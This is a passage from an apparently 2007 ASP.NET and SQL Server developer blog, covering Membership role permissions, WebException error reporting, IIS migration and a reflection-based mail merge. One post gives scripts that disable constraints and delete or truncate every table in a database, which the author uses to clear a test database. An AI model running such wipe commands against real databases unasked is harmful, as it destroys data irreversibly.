Sam Michel, Chinwag MD and founder said: "This is a great opportunity for the new media industry to do some "First Life" networking. The UK scene is buzzing with life, and it's great to bring everyone together en masse."

"The party takes place on July 5. More details will be released in the forthcoming weeks with promotional activities, partnership with brands, and innovative use of social networking tools and technologies such as Facebook and Twitter included in the mix."

More information & registration: http://bigsummer07.chinwag.com

About Chinwag

Chinwag aims to be a connecting rod for ideas and talent across the new media industries. Having provided Internet-based community forums, websites, email newsletters and consultancy for the new media sector since 1996, its website (http://www.chinwag.com) will be re-launched in July, aggregating information for the digital industries and updating its community focus. In February 2007 the Chinwag Live events series (http://live.chinwag.com) was launched. Topical panel discussions founded to cast light on issues and trends affecting the new media industries, the monthly sessions have also gone on tour to Internet World and Ad:Tech.

In addition, Chinwag publishes Chinwag Jobs (http://jobs.chinwag.com), the leading recruitment website for online marketing, digital media, web, design and technical positions. It is used by the BBC, MySpace.com, Yahoo!, Amazon, Vodafone and the majority of recruitment agencies who place staff in the sector.

Chinwag - Connecting New Media People

Site: http://bigsummer07.chinwag.com

Friday, June 08, 2007 12:39:02 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [1]  | 
# Wednesday, May 16, 2007

We’ve gone around in circles at The Site Doctor trying to decide the best method to calculate project costs and timings, historically I would look at the project brief, have a think about how much I wanted to work for a client and then I would –in effect- pluck a figure out of the air.

As your company grows however you will need to think about a more scalable, resilient solution that reduces the chance of under quoting and I think we have a fairly nice solution so I thought I would share it :)

Firstly, read up on how to set your base rate (see: Pricing your work). Once you have calculated your base rate, download this spreadsheet. When offering the client various options, each option is given its own row on the summary table, which is calculated from a dedicated sheet of times.

The formatting is fairly simple and mainly for your own use. Basically, the main areas of development (i.e. the front end, my account or admin areas) use a grey background, the sub sections of these (i.e. product management) use a yellow background, and all other items have a white background; the main reason for this is that on a large project it makes it a lot easier to identify where you are. The top columns are not set –they’re just what we most commonly use– and you can alter these as needed on the summary sheet.

How to use it

  1. Add all your site elements (usually based on your sitemap) into the first column, separating each one out onto its own line.
  2. Go through each item, estimating the time required to complete the task. Remember that the spreadsheet is using decimal hours:
    • 0.02 = 1 minute
    • 0.08 = 5 minutes
    • 0.17 = 10 minutes
    • 0.25 = 15 minutes
    • 0.33 = 20 minutes
    • 0.42 = 25 minutes
    • 0.50 = 30 minutes
    • 0.58 = 35 minutes
    • 0.67 = 40 minutes
    • 0.75 = 45 minutes
    • 0.83 = 50 minutes
    • 0.92 = 55 minutes
    • 1.00 = 60 minutes (1 hour)
  3. Switch over to the summary page and update the hourly rates to your rates
  4. Et voila you have your project’s estimated cost :)
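The decimal-hour figures in the table above are just minutes divided by 60, rounded to two decimal places; if you'd rather not key them in by hand, a tiny helper reproduces the whole table (a trivial sketch, Python used for illustration):

```python
def decimal_hours(minutes):
    """Convert minutes to the decimal-hour figure the spreadsheet uses,
    rounded to two decimal places (e.g. 15 minutes -> 0.25 hours)."""
    return round(minutes / 60.0, 2)

# Reproduce the lookup table from the post
for m in range(5, 65, 5):
    print("%2d minutes = %.2f hours" % (m, decimal_hours(m)))
```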

You’ll be surprised how quickly project costs mount up when you use this method, but it does ensure that you don’t get caught out. If it is still too costly for the client, why not show them the breakdown, as it quantifies your efforts neatly. If that doesn’t work, see how tweaking your hourly rate or removing some timings works out –but don’t be a busy fool ;)

Project time estimate spreadsheet

Wednesday, May 16, 2007 2:42:04 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [2]  | 
# Wednesday, May 02, 2007

I can’t recall how I came across FreelanceSwitch because it was one of those links you see on a mailing list, open to read later and forget to read until a couple of days/weeks later, but nevertheless FreelanceSwitch is well worth a read as they have a tonne of massively useful advice and they seem to be adding stacks more!

Scott Wills also posted an interesting read on getting the price for your work right. In this article on pricing your work, Scott briefly touches on how to set a base rate but concentrates more on estimating your time, so if you’re interested in calculating a base rate for your work, have a read of my article (see: Pricing Your Work) as I feel it covers that in more detail. Scott’s article can be found here: The Price is Right on FreelanceSwitch.

FreelanceSwitch also gave my article on business start up advice a shout the other day which was most flattering –I hope I’ve managed to pick up a few additional readers! Hello if you're new :). You can read the list of other useful links and see mine at: Linkswitch -a roundup of great links across the web 3.

The long and short of it is to keep an eye on the FreelanceSwitch website at: http://freelanceswitch.com/.

Wednesday, May 02, 2007 7:24:54 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Tuesday, May 01, 2007

We have recently moved over to SQL Server 2005 and as part of this transfer I decided to aggregate two separate ASP.Net Membership databases that were created purely out of error.

For those of you who don’t already know, you can happily run more than one application’s security from a single membership database as long as you correctly configure the web.config’s security settings –for more information on doing that see my post on having dual records in the ASP.Net authentication table (see: Dual Records In The ASPNet Authentication Table). The important attribute/value to configure if you are planning on running more than one application from the same roles database is “applicationName”. If you do not set “applicationName” you will find that users can log in across all your applications, roles/access levels will get mixed up and a whole bunch of other hullabaloo!
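For reference, here is a minimal sketch of the relevant web.config section –the provider name, connection string name and application name are placeholders, the point being that each application sets its own applicationName while sharing the same database:

```xml
<!-- sketch only: the name, connectionStringName and applicationName
     values are placeholders -->
<system.web>
  <membership defaultProvider="SqlProvider">
    <providers>
      <add name="SqlProvider"
           type="System.Web.Security.SqlMembershipProvider"
           connectionStringName="SharedMembershipDb"
           applicationName="/MyFirstApp" />
    </providers>
  </membership>
</system.web>
```

A second application pointing at the same database would use a different applicationName (say "/MySecondApp"), keeping its users and roles separate.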

Luckily for me, the only records stored in one of the membership databases were two users, both of which I knew the password to so I decided I would simply update the web.config with the new database connection string and add them manually.

The next thing I wanted to sort, however, was the specific SQL Login’s access to the membership database. Previously I simply added the user to all the various aspnet_ roles that were in the database, which worked fine. As I’m looking to use this database for other applications in the future and I don’t like sharing usernames/passwords across applications, adding the roles each time would become a real PITA, so I decided to add a new role with all the access required for the database; then I can simply add each user to this new role. I called the role IIS_User.

A number of our applications build on the foundation of the ASP.Net Membership database with application specific values, so I tend to have another table for the application’s users within the application’s own database to store them. The user has the usual UserId (usually an int) and a uniqueidentifier which allows me to link the two databases together. With this in mind, I needed additional access to the ASP.Net Membership database –SELECT permission on the tables. I don’t like adding more permissions to a role than needed, but I needed a method of doing this quickly –assigning EXECUTE and SELECT permissions to the new role on the various tables/stored procedures. In time I’ll revisit this, work out which permissions are actually needed by the role and remove the rest, but for now this’ll do :)

The quick and dirty T-SQL

DECLARE @SQL nvarchar(4000),
    @Owner sysname,
    @objName sysname,
    @Return int,
    @objType nvarchar(5),
    @rolename nvarchar(255)

SET @rolename = 'IIS_User'

-- Cursor over all the aspnet_ tables and stored procedures in the current database
DECLARE cursStoredProcedures CURSOR FAST_FORWARD
FOR
SELECT 
    USER_NAME(uid) Owner, 
    [name] StoredProcedure,
    xtype
FROM
    sysobjects
WHERE
(
    xtype = 'U'
  OR
    xtype = 'P'
)
  AND
    LEFT([name], 7) = 'aspnet_'

OPEN cursStoredProcedures

-- Get the first row
FETCH NEXT FROM cursStoredProcedures
INTO @Owner, @objName, @objType

-- Set the return code to 0
SET @Return = 0

-- Encapsulate the permissions assignment within a transaction
BEGIN TRAN

-- Cycle through the rows of the cursor
-- And grant permissions
WHILE ((@@FETCH_STATUS = 0) AND (@Return = 0))
  BEGIN

    --Determine the object's type (table/stored procedure) -could 
    --be done using a case too if more objects are added later
    IF @objType = 'P'
    BEGIN
        SET @SQL = 'GRANT EXECUTE ON [' + @Owner + '].[' + @objName  + '] TO ' + @rolename
    END

    IF @objType = 'U'
    BEGIN
        SET @SQL = 'GRANT SELECT ON [' + @Owner + '].[' + @objName  + '] TO ' + @rolename
    END

    -- Execute the SQL statement
    EXEC @Return = sp_executesql @SQL

    -- Get the next row
    FETCH NEXT FROM cursStoredProcedures
    INTO @Owner, @objName, @objType
  END

-- Clean-up after the cursor
CLOSE cursStoredProcedures
DEALLOCATE cursStoredProcedures

-- Check to see if the WHILE loop exited with an error.
IF (@Return = 0)
  BEGIN
    -- Exited fine, commit the permissions
    COMMIT TRAN
  END
ELSE
  BEGIN
    -- Exited with an error, rollback any changes
    ROLLBACK TRAN
    
    -- Report the error
    SET @SQL = 'Error granting permission to ['
    + @Owner + '].[' + @objName + ']'
    RAISERROR(@SQL, 16, 1)
  END
GO
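If you want to sanity-check the result, something along these lines should list the object-level permissions the role now holds. Note this uses the SQL Server 2005+ catalog views rather than the older sysobjects the script above queries, so it's a sketch to adapt rather than a drop-in:

```sql
-- List every object-level permission granted to the IIS_User role
SELECT
    dp.permission_name,
    OBJECT_NAME(dp.major_id) AS ObjectName
FROM sys.database_permissions dp
    INNER JOIN sys.database_principals pr
        ON dp.grantee_principal_id = pr.principal_id
WHERE pr.name = 'IIS_User'
ORDER BY ObjectName
```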
Tuesday, May 01, 2007 8:41:48 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Tuesday, April 17, 2007

I expect many people already know about this technique but I wanted to share it with those that don't. The other day I needed to remove all data from a database before importing data from another database. I usually use DTS to copy the data across, but I knew that the target (test) database had conflicting ids, so deleting all the data out of it first seemed the best way to ensure everything was up to date.

I found this useful little set of SQL at: http://sqljunkies.com/WebLog/roman/archive/2006/03/03/18386.aspx. There are two solutions proposed within the post and its comments, so here they both are:

Delete the data without resetting the identities

-- disable referential integrity
EXEC sp_MSForEachTable 'ALTER TABLE ? NOCHECK CONSTRAINT ALL'
GO

EXEC sp_MSForEachTable 'DELETE FROM ?'
GO
-- enable referential integrity again
EXEC sp_MSForEachTable 'ALTER TABLE ? CHECK CONSTRAINT ALL'
GO

Delete the data and reset the identities

-- disable referential integrity
EXEC sp_MSForEachTable 'ALTER TABLE ? NOCHECK CONSTRAINT ALL' 
GO 

EXEC sp_MSForEachTable 'TRUNCATE TABLE ?' 
GO 

-- enable referential integrity again 
EXEC sp_MSForEachTable 'ALTER TABLE ? CHECK CONSTRAINT ALL' 
GO
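One caveat with the second script: TRUNCATE TABLE will fail on any table that is referenced by a foreign key, even with the constraints disabled, so for those tables you're stuck with DELETE. In that case you can still reset the identity values separately; a sketch (assuming the default seed, so the next inserted row gets identity 1) would be:

```sql
-- Reseed identity columns after a DELETE
EXEC sp_MSForEachTable 'IF OBJECTPROPERTY(OBJECT_ID(''?''), ''TableHasIdentity'') = 1 DBCC CHECKIDENT (''?'', RESEED, 0)'
GO
```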
Tuesday, April 17, 2007 4:18:54 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [6]  | 
# Monday, March 19, 2007

I’ve done a number of posts now on Phil Whinstanley’s error reporting class and this blog appears to be getting a lot of hits because of that which is pretty neat, as a result I’ve had a couple of people write to me asking similar questions about the code so I thought it would be an idea to write a little summary.

Where can I download the code?

It would appear that most of the old copies of Phil's code have disappeared from the web; I'm not sure why, so I've uploaded the versions I've got below. For convenience I have compiled the code into DLLs for those that don't know how to (or don't want to) do this, and I've also included the Visual Studio solutions. I'm not sure if these are based on the original codebase, but I don't think I've made any major alterations to these versions:

1 This is a version I was sent as his original; the copy including his changes and the example email was lost...

DLLs only:

If you have Visual Studio:

If you don't have Visual Studio you can either download one of the above projects and delete the solution/project files, or download the original WebException code. Ok, now you have the files :) FWIW, I can accept no responsibility for any of the files or the code, I just zipped them!

How do I use the WebException class?

I'm now using a slightly modified version of the code to enable error reporting within AJAX (see: Reporting errors from AJAX using the WebException Class) which I'll try and upload later, but whichever version of the code you choose, the usage is pretty much the same.

Once you have referenced the DLL in your project (see: Importing/Referencing DLLs in Visual Studio) you will be able to use the WebException. As I've covered what you need to do to use the code from within an AJAX application in another post (see: Reporting errors from AJAX using the WebException Class), I'll just cover how to use it to report global errors here. To capture and respond to all application errors you will need to place this code within the global.asax; your project should automatically have one, and if it doesn't you will need to add one.

Using the global.asax file, the first thing you need to do is add a reference to the DLL at the top of your code (this will allow you to call the methods and access the properties):

<%@ Import Namespace="ErrorReporting" %>

Next locate the Application_Error event handler; this is the method that handles all errors within the application (with the exception of those thrown from within an AJAX application — read this post to report errors from within an AJAX application). Now replace your Application_Error and Application_PreRequestHandlerExecute handlers with the following (for more information on what I'm doing here see: ASP.Net WebException and Error Reporting useful code):

void Application_Error(object sender, EventArgs e)
{
    bool reportErrors = Convert.ToBoolean(System.Configuration.ConfigurationManager.AppSettings["SendErrors"]);

    if (reportErrors)
    {
        Exception currentError = Server.GetLastError();

        #region Deal with 404's

        //Redirect the user to a friendly page
        if(CheckForErrorType(currentError, "FileNotFound"))
            RedirectToFriendlyUrl("");

        #endregion
        #region Deal with Spambots

        if (CheckForErrorType(currentError, "System.FormatException"))
        {
            if (HttpContext.Current.Request.Form.Count > 0)
            {
                foreach (string key in HttpContext.Current.Request.Form)
                {
                    if (key.IndexOf("_VIEWSTATE") > 0 && HttpContext.Current.Request.Form[key].ToString().IndexOf("Content-Type") > 0)
                        return;
                }
            }
        }

        #endregion

        //Enable the trace for the duration of the error handling
        TraceContext t = HttpContext.Current.Trace;
        bool bCurrentState = t.IsEnabled;
        t.IsEnabled = true;

        #region Handle the Exception

        ErrorHandling.WebException WE = new ErrorHandling.WebException();
        WE.CurrentException = Server.GetLastError();
        WE.MailFrom = "you@yourdomain.com";
        WE.MailTo = "you@yourdomain.com";
        WE.MailAdmin = "you@yourdomain.com";
        WE.Site = "Your Site's Name or URL";
        WE.SmtpServer = "localhost";
        WE.FloodCount = 10;
        WE.FloodMins = 5;

        #endregion
        #region Choose what you're interested in

        WE.ReturnCache = true;
        WE.DrillDownInCache = true;
        WE.IncludeApplication = true;
        WE.IncludeBrowser = true;
        WE.IncludeEnvironmentVariables = true;
        WE.IncludeForm = true;
        WE.IncludeProcess = true;
        WE.IncludeQueryString = true;
        WE.IncludeRequestCookies = true;
        WE.IncludeRequestHeader = true;
        WE.IncludeResponseCookies = true;
        WE.IncludeServerVariables = true;
        WE.IncludeSession = true;
        WE.IncludeTrace = true;
        WE.IncludeVersions = true;
        WE.IncludeAuthentication = true;

        #endregion

        WE.Handle();

        //Return the trace to its original state
        t.IsEnabled = bCurrentState;

        //Redirect the user to a friendly page
        RedirectToFriendlyUrl("");
    }
}

protected void Application_PreRequestHandlerExecute(Object sender, EventArgs e)
{
    if (Context.Handler is IRequiresSessionState || Context.Handler is IReadOnlySessionState)
        ErrorReporting.SessionTracker.AddRequest("Pre Request Handler Execute", true, true, false);
}

private bool CheckForErrorType(Exception ex, string errorText)
{
    if (ex != null)
    {
        //Check the exception
        if (ex.GetType().ToString().IndexOf(errorText) >= 0)
            return true;
        else
            return CheckForErrorType(ex.InnerException, errorText);
    }
    else
    {
        return false;
    }
}

private void RedirectToFriendlyUrl(string Url)
{
    if (!String.IsNullOrEmpty(Url) && (Request.Url.Host.IndexOf("localhost") < 0))
        Response.Redirect(Url);
}

This will create a new instance of the WebException object, assign the various properties accordingly (you will need to configure these to suit your site) and then finally handle the error.
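The reportErrors check at the top of Application_Error reads a "SendErrors" value from appSettings, so you'll also want an entry along these lines in your web.config (the key name comes from the code above; the value is up to you):

```xml
<appSettings>
  <!-- Set to "false" on development machines to silence the error reports -->
  <add key="SendErrors" value="true" />
</appSettings>
```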

That's it! That's all you really need to do to have super error reporting instantly installed in your application! If that wasn't enough, it's overloaded with a couple of filters for you :). I recommend you read one of my previous posts, which overviews a few simple tips and tricks for using the WebException class that improve on its functionality (see: ASP.Net WebException and Error Reporting useful code).

All that's left to do is to test it works (see below).

What should I get from it?

That’s the million dollar question! Once the WebException class has been added to your application you should receive an email every time the application throws an error (which of course means you’ll never get an email from the system!)

View an example of the email you’ll get with all outputs set to true.

More tips/Warnings!

Ok, so it's installed and you're getting no errors through (because your code's perfect), but there are a couple of other little tweaks I would make to the WebException class to make it a little more usable.

Create a centralised class for it

A while ago I posted a set of "useful" tips for reducing the number of spambot-related emails, redirecting the user etc (see: ASP.Net WebException and Error Reporting useful code). That's fine until you start including the WebException class in multiple projects; managing tweaks to the codebase then gets a little cumbersome (i.e. adding the spambot check to all our projects that use the WebException meant a couple of hours of copying and pasting). The workaround for me was to wrap it all up into a central static method (see: Reporting errors from AJAX using the WebException Class). I did this rather than fiddling with Phil's WebException class itself in case he ever got around to releasing another version, which would mean a bunch of changes etc.

Limit the page request log

If you have a site where every user is likely to have a high page visit count, with most of the pages involving some form of form submission, then it may be worth limiting the number of requests stored, as we have found that without limiting these we started receiving very large emails (some topping 10MB).

The reason this happens is that the session tracker logs all the form elements for each request. So if you had, say, a CMS that submits a page of content every other page request, all of that data will be stored in the tracker. Sticking with the idea of a CMS: a typical word of text is around 10 bytes (see: How many bytes for...), so if the user writes 500 words per page (which isn't really a lot) that's 4.9KB per form submission, plus on the re-display of the page you've got ViewState... And that's just the data submitted by the user; around that you've got all the form fields, field names, session info, query string etc. See how it starts to add up?

The solution is fairly straightforward: what you need to do is alter SessionTracker.cs1:

1I thought I'd done this in a project already but cannot find the source so this may not work.

public class SessionTracker
{
    public static void AddRequest(string Comments, bool DoForm, bool DoQueryString, bool DoCookies)
    {
        Request R = new Request();
        R.Time = DateTime.Now;
        R.Comments = Comments;
        
        if (System.Web.HttpContext.Current != null)
        {
            R.Path = System.Web.HttpContext.Current.Request.Path.ToString();
            if (System.Web.HttpContext.Current.Request.UrlReferrer != null)
            {
                R.Referrer = System.Web.HttpContext.Current.Request.UrlReferrer.ToString();
            }
            if (DoForm)
            {
                R.Form = System.Web.HttpContext.Current.Request.Form;
            }
            if (DoQueryString)
            {
                R.QueryString = System.Web.HttpContext.Current.Request.QueryString;
            }
            if (DoCookies)
            {
                R.Cookies = System.Web.HttpContext.Current.Request.Cookies;
            }
        }

        if (System.Web.HttpContext.Current.Session["RequestCollection"] != null)
        {
            RequestCollection RC = ((RequestCollection)System.Web.HttpContext.Current.Session["RequestCollection"]);
            RC.Add(R);
            if(RC.Count > 10)
                RC.RemoveAt(0);
            System.Web.HttpContext.Current.Session["RequestCollection"] = RC;
        }
        else
        {
            RequestCollection RC = new RequestCollection();
            RC.Add(R);
            System.Web.HttpContext.Current.Session["RequestCollection"] = RC;
        }
    }

    public static void AddRequest(string Comments)
    {
        Request R = new Request();
        R.Time = DateTime.Now;
        R.Comments = Comments;
        
        if (System.Web.HttpContext.Current != null)
        {
            R.Path = System.Web.HttpContext.Current.Request.Path.ToString();
            if (System.Web.HttpContext.Current.Request.UrlReferrer != null)
            {
                R.Referrer = System.Web.HttpContext.Current.Request.UrlReferrer.ToString();
            }
            R.Form = System.Web.HttpContext.Current.Request.Form;
            R.QueryString = System.Web.HttpContext.Current.Request.QueryString;
            R.Cookies = System.Web.HttpContext.Current.Request.Cookies;
        }

        if (System.Web.HttpContext.Current.Session["RequestCollection"] != null)
        {
            RequestCollection RC = ((RequestCollection)System.Web.HttpContext.Current.Session["RequestCollection"]);
            RC.Add(R);
            if (RC.Count > 10)
                RC.RemoveAt(0);
            System.Web.HttpContext.Current.Session["RequestCollection"] = RC;
        }
        else
        {
            RequestCollection RC = new RequestCollection();
            RC.Add(R);
            System.Web.HttpContext.Current.Session["RequestCollection"] = RC;
        }
    }

    public static void AddRequest()
    {
        Request R = new Request();
        R.Time = DateTime.Now;
        
        if (System.Web.HttpContext.Current.Session["RequestCollection"] != null)
        {
            RequestCollection RC = ((RequestCollection)System.Web.HttpContext.Current.Session["RequestCollection"]);
            RC.Add(R);
            if (RC.Count > 10)
                RC.RemoveAt(0);
            System.Web.HttpContext.Current.Session["RequestCollection"] = RC;
        }
        else
        {
            RequestCollection RC = new RequestCollection();
            RC.Add(R);
            System.Web.HttpContext.Current.Session["RequestCollection"] = RC;
        }
    }

    public SessionTracker()
    {
    }
}

Outputting the Trace with the WebException Class

I know this is something I've posted about in the past, but since moving to version 4 of the code and .Net 2.0 I was no longer getting the trace in my lovely error reports. After a little digging I've found a solution: in addition to the code that I posted earlier about enabling the trace using C#, the web.config needs to be set as follows:

<trace enabled="true" requestLimit="100" pageOutput="false" traceMode="SortByTime" localOnly="true" />

Storing the WebException code in App_Code Dir

If you use the WebException class in an ASP.Net 2.0 site, be careful you don’t do what we did and throw the site online uncompiled with a compilation error as it won’t get reported. Luckily I found this issue on a test site but it’s still worth noting.

Personally I wouldn’t put the error reporting code in the App_Code directory as this means you’ll end up needing to maintain a plethora of files throughout various projects. Instead compile a separate DLL and include that in your projects, then if like me you find a nice addition to the error reporting code you can easily update all sites to the latest version!

Setup a simple generic test page

Nothing fancy, just a button that throws an exception will do:

TestErrorPage.aspx

<%@ Page Language="C#" %>


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script runat="server">
    protected void btnError_Click(object sender, EventArgs e)
    {
        throw new ArgumentException("Test Error");
    }
</script>

<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
    <title>Test Error Page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
        <p><asp:Button runat="server" ID="btnError" Text="Throw Error" OnClick="btnError_Click" /></p>
    </div>
    </form>
</body>
</html>

Happy Error Reporting :) -I'm hoping this is the last time I need to blog about this code but what's the betting another post is around the corner ;)

Monday, March 19, 2007 7:34:20 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [2]  | 
# Tuesday, March 13, 2007

Get your finger on the pulse of your site with this great new (free) RSS statistics service, "PulseRSS". I met the developers of PulseRSS the other day at my first Multipack meet (a West Midlands based new media meet) which, if you're nearby, you should check out in the future as they're a lovely bunch of guys (and girls apparently, but they were nowhere to be seen on Saturday).

Back to PulseRSS! As already mentioned, PulseRSS is a statistics service delivered via an RSS/XML feed that works in a very similar way to Google Analytics. Unlike Google Analytics, though, they've followed the principle of KISS, which I think works really well: the interface is simple and easy to use. And have I already mentioned it's free?

So if you’re looking for a simple free statistics package then check out PulseRSS –I’ve got it running on my blog already so it’ll be interesting to see how the stats compare to Google Analytics...

Pulse Logo

Tuesday, March 13, 2007 10:45:25 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Monday, March 12, 2007

Another post from Doug Setzer from 27Seconds.com :)


At my "day job", the systems guys are building new Windows 2003 servers to upgrade our aging Windows 2000 servers.  The plan is to:
 - Build the new Windows 2003 server
 - Install IIS
 - Install .NET
 - Run the IIS migration tool from the old Win2k server

That all went about as well as it could; little things got mixed up and had to be corrected. But then, although the server would let you request plain HTML files and ASPX files, classic ASP pages were returned blank. In poking around Google and the server, we came to find that we had to enable ASP content via:
 - IIS Manager
 - Web Services Extensions
 - Specifically allow Active Server Pages

But, we were still having the same issues.  Stopping and restarting IIS didn't help. Nor did a server reboot.

I found a blog post that mentioned checking that the ASP ISAPI has the correct path. I had a random thought that Microsoft had changed the default name of the "Windows"/"Winnt" folder: Windows NT4, 2000, etc. all use "Winnt", whereas Windows 2003 uses the "Windows" folder. Sure enough, double-checking the path to the ASP ISAPI showed the wrong path, and correcting it fixed our issues with classic ASP files.
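For reference, the mapping in question is the .asp extension mapping in the site's Application Configuration in IIS Manager, which should point at asp.dll under the system folder. The two paths typically look like this (drive letter will vary):

```
\Winnt\System32\inetsrv\asp.dll     stale path carried over from Windows 2000
\Windows\System32\inetsrv\asp.dll   correct location on Windows Server 2003
```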

Monday, March 12, 2007 10:49:09 AM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [2]  | 
# Friday, March 09, 2007

This morning Julian Voelcker came to me with an interesting issue that I’ve looked into before but I’ve never really looked into a re-useable solution. Seeing as it’s fun Friday I thought why not ;)

The scenario: I would like to offer my users a custom mail merge facility whereby they can insert values stored in the database, such as their name. The selection of columns is unlikely to change, and if it does then I'll be the one to do it. There are about 20 fields to choose from.

Easy enough; in the past I've kept it to a minimum and then just done a simple find and replace on the body, i.e.:

//Create a dataset and add some test columns
DataTable dt = new DataTable();
dt.Columns.Add("Name");
dt.Columns.Add("Email");

#region Add some test data

DataRow dr = dt.NewRow();
dr["Name"] = "Julian";
dr["Email"] = "julian@email.com";
dt.Rows.Add(dr);

dr = dt.NewRow();
dr["Name"] = "Tim";
dr["Email"] = "tim@email.com";
dt.Rows.Add(dr);

#endregion

#region Create the example email body

string emailBody = "<p>This is a test email to {{Name}} that would be sent to the email address: {{Email}}.</p>";

#endregion

#region Do the work

//Loop through the rows
for (int i = 0; i < dt.Rows.Count; i++)
{
    //Get the data row for this instance
    DataRow row = dt.Rows[i];

    //Create a new body as this'll be updated for each user
    string body = String.Empty;

    //Update the body
    body = emailBody.Replace("{{Name}}", row["Name"].ToString());
    body = body.Replace("{{Email}}", row["Email"].ToString());

    litOutput.Text += String.Format("{0}<hr />", body);
}

#endregion

The issue I see with this, however, is (among others) that 20 fields is a lot to be handling with find/replace statements; it wouldn't be very elegant and would be a nightmare to manage. Sticking with this method of using a dataset, I suggested we use a regular expression to match the field delimiters and do the replace that way:

//Create a dataset and add some test columns
DataTable dt = new DataTable();
dt.Columns.Add("Name");
dt.Columns.Add("Email");

#region Add some test data

DataRow dr = dt.NewRow();
dr["Name"] = "Julian";
dr["Email"] = "julian@email.com";
dt.Rows.Add(dr);

dr = dt.NewRow();
dr["Name"] = "Tim";
dr["Email"] = "tim@email.com";
dt.Rows.Add(dr);

#endregion

#region Create the example email body

string emailBody = "<p>This is a test email to {{Name}} that would be sent to the email address: {{Email}}.</p>";

#endregion

#region Do the work

//Loop through the rows
for (int i = 0; i < dt.Rows.Count; i++)
{
    //Get the data row for this instance
    DataRow row = dt.Rows[i];

    MatchEvaluator replaceField = delegate(Match m)
    {
        return row[m.Groups[1].ToString()].ToString();
    };

    //Create a new body as this'll be updated for each user
    string body = String.Empty;
    //Find the fields
    Regex r = new Regex(@"{{(\w{0,15}?)}}");
    body = r.Replace(emailBody, replaceField);

    litOutput.Text += String.Format("{0}<hr />", body);
}

#endregion

This is alright and in many ways very scalable. I'm not a fan of DataSets, but in this instance it works nicely, and it does mean expanding the available fields at a later date would just be a matter of adding columns to the query.

How does this relate to accessing a property of an object using a string value instead? Well, there was a catch: Julian wasn't using a DataSet and didn't want to; he had a collection of custom objects all ready and waiting. As he uses a code generator to generate his Data Access Layer and Business Logic Layer there was a method already exposed allowing you to search for a property by string, but it's not a standard .Net method, so I decided to work out how it was done.

The solution, it turned out, was really rather elegant IMHO. Using reflection you can use the same concept as above but with custom objects, and Robert is your father's wife's sister:

Reflection.aspx

<%@ Page Language="C#" AutoEventWireup="true" CodeFile="Reflection.aspx.cs" Inherits="Reflection" %>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head runat="server">
    <title>Untitled Page</title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
        <h1>Reflection Demo</h1>
        <p>Choose from the following fields to build up your email message, the valid fields are (you can choose whether to use non-valid fields as a test if you like):</p>
        <ul>
            <li>Id</li>
            <li>Email</li>
            <li>Name</li>
            <li>JoinedDate</li>
        </ul>
        <p><asp:CheckBox ID="chkCaseSensitive" runat="server" Text="Make the property search case insensitive" /></p>
        <p><label for="txtEmailBody">Example email body:</label><br />
        <asp:TextBox runat="server" ID="txtEmailBody" TextMode="MultiLine" style="width: 500px; height: 200px;" /></p>
        <p><small>HTML submissions are not allowed and they're encoded anyways so no point in spamming -not that you were going to of course!</small></p>
        <p><asp:Button runat="server" ID="btnSubmit" Text="Merge It!" OnClick="btnSubmit_Click" /></p>
        <asp:Literal ID="litOutput" runat="server" />
    </div>
    </form>
</body>
</html>

Reflection.aspx.cs

using System;
using System.Data;
using System.Configuration;
using System.Collections;
using System.Web;
using System.Web.Security;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Web.UI.HtmlControls;

using System.Text.RegularExpressions;
using System.Collections.Generic;
using System.Reflection;

public class TestObject
{
    private int __Id;
    private string __Name;
    private string __Email;
    private DateTime __JoinedDate;

    public int Id
    {
        get
        {
            return __Id;
        }
        set
        {
            __Id = value;
        }
    }
    public string Name
    {
        get
        {
            return __Name;
        }
        set
        {
            __Name = value;
        }
    }
    public string Email
    {
        get
        {
            return __Email;
        }
        set
        {
            __Email = value;
        }
    }
    public DateTime JoinedDate
    {
        get
        {
            return __JoinedDate;
        }
        set
        {
            __JoinedDate = value;
        }
    }

    public TestObject(int id, string name, string email, DateTime joinedDate)
    {
        __Id = id;
        __Name = name;
        __Email = email;
        __JoinedDate = joinedDate;
    }

    public bool GetPropertyValueByName(string propertyName)
    {
        object obj = null;
        return this.GetPropertyValueByName(propertyName, false, ref obj);
    }

    public bool GetPropertyValueByName(string propertyName, ref object val)
    {
        return this.GetPropertyValueByName(propertyName, false, ref val);
    }

    public bool GetPropertyValueByName(string propertyName, bool caseInsensitive, ref object val)
    {
        PropertyInfo p = null;
        BindingFlags flags = BindingFlags.Instance | BindingFlags.Public | BindingFlags.NonPublic;

        //If it's a case-insensitive search then add the flag
        if (caseInsensitive)
            flags = flags | BindingFlags.IgnoreCase;

        p = this.GetType().GetProperty(
               propertyName,
               flags,
               null,
               null,
               Type.EmptyTypes,
               null);

        //Check the property exists and that it has read access
        if (p != null && p.CanRead)
        {
            //There is a property that matches the name, we can read it so get it
            val = this.GetType().InvokeMember(
                propertyName,
                BindingFlags.GetProperty | flags,
                null,
                this,
                null);

            //We return true as the user may just want to check that it exists
            return true;
        }

        return false;
    }
}

public partial class Reflection : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!Page.IsPostBack)
        {
            #region Create the example email body

            txtEmailBody.Text = "Dear {{Name}},\r\n\r\nThis is a test email that would be sent to the email address: {{Email}}.\r\n\r\n{{Name}} joined on: {{JoinedDate}}. This field should not be found {{Don't Find Me}}\r\n\r\nRegards,\r\n\r\nThe webmaster.";

            #endregion
        }
    }

